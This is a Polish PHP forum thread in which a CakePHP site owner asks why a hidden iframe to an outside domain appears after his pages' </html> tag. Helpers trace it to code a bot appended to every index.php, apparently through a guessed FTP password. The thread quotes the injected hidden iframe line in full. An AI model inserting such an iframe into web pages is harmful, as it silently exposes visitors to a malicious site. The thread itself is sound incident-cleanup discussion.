[CakePHP] Wirus Opcje

[Bajki]

Witam
Wczoraj w jakiś nieznany mi sposób w pliki CakePHP znajdujące się na serwerze (moim) wkradł się jakiś rodzaj wirusa (być może to zdanie jest niepoprawne logicznie ale nie to jest najważniejsze w tej sprawie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) ), który dodaje zaraz po znaczniku </html> taką oto linijke :

[HTML] pobierz, plaintext 
<iframe src="http://thedeadpit.com/?click=1336703" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
[HTML] pobierz, plaintext 

Powoduje to blokowanie przez niektóre antywirusy(np. AVAST) mojej witryny. Jeśli to coś pomoże, oto adres serwisu : www.hcphotos.pl

Postanowiłem wgrać na serwer nie ruszany folder "cake" jednak problem nie zniknął. Czy ktoś może mi powiedzieć gdzie i czego mam szukać żeby się tego pozbyć? wg. avasta wirus nazywa się "HTML:Iframe-inf".

Pozdrawiam i liczę na pomoc (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Ten post edytował Bajki 22.12.2008, 15:57:47

[erix]

Czy ktoś może mi powiedzieć gdzie i czego mam szukać żeby się tego pozbyć? wg. avasta wirus nazywa się "HTML:Iframe-inf".

Albo HTML-Injection, albo ktoś dobrał się do Twojego hasła na FTP. Bardziej prawdopodobna jest pierwsza opcja.

[Bajki]

kurcze ale niezabardzo gdzie było przeprowadzić html-injection ;/ tzn na stronie nie ma żadnych formularzy i tym podobnych rzeczy, które wypełniał by użytkownik. Jedyne co przychodzi mi do głowy to to, że przez chwilę panel administracyjny znajdujący się pod adresem /admin/ był niezabezpieczony i może wtedy jakiś bot coś narobił...

ale w takim razie co z tym teraz robić ?

[pyro]

przejrzyj logi, zabezpieczcz pa o ktorym mowiles i usun kod frame'a...

[Bajki]

heh no właśnie sęk w tym, że tego niema w plikach widoku (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) to jest dodawane...w jakiś tajemniczy dla mnie sposób. Nie wiem czy przez jakiś plik php czy JS...

[pyro]

może...

auto_prepend_file / auto_append_file?

[erix]

JS, to nie ta bajka, ~Bajki. (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Sprawdź, czy weryfikujesz wszystkie dane pochodzące od usera.

[Bajki]

auto_prepend_file / auto_append_file?

Rozumiem, że takie zmienne(?) pojawiły by się w kontrolerze ?

Sprawdź, czy weryfikujesz wszystkie dane pochodzące od usera.

Hmmm myślałem, że CakePHP robi to sam (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) ale skoro nie...to i tak tam niema czego weryfikować ;/ user poprostu ogląda strone główną, lub koncert, lub album z koncertu. Nigdzie niczego nie wpisuje (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Ale zauważyłem, że ta linijka dodawana jest tylko w przypadku istniejących kontrolerów tzn kiedy poda się zły adres to wczytuje się domyślny layout, ale linijka nie jest dodawana. Być może to jest jakiś trop...

[l0ud]

Takie boty w celu kompatybilności najczęściej dopisują się do głównego pliku, czyli index.php i to na jego końcu szukałbym tego kodu. Nie ma co kombinować (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

[Bajki]

haha faktycznie (IMG:http://forum.php.pl/style_emoticons/default/exclamation.gif) bot dopisał do kazdego pliku index.php na serwerze linijke z tym kodem ! (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) kurcze dzięki wielkie za pomoc wszystkim ! (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

[l0ud]

Teraz pozostała Ci zmiana hasła do FTP oraz przeskanowanie programem antywirusowym wszystkich komputerów, na których logowałeś się na FTP. Bo skądś bot musiał mieć to hasło...

[Bajki]

hmm zarówno login jak i hasło były bardzo łatwe do zgadnięcia (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) więc może to kwestia tego. ale przeskanuje ;P a hasło i login zmienione ;P

dzieki jeszcze raz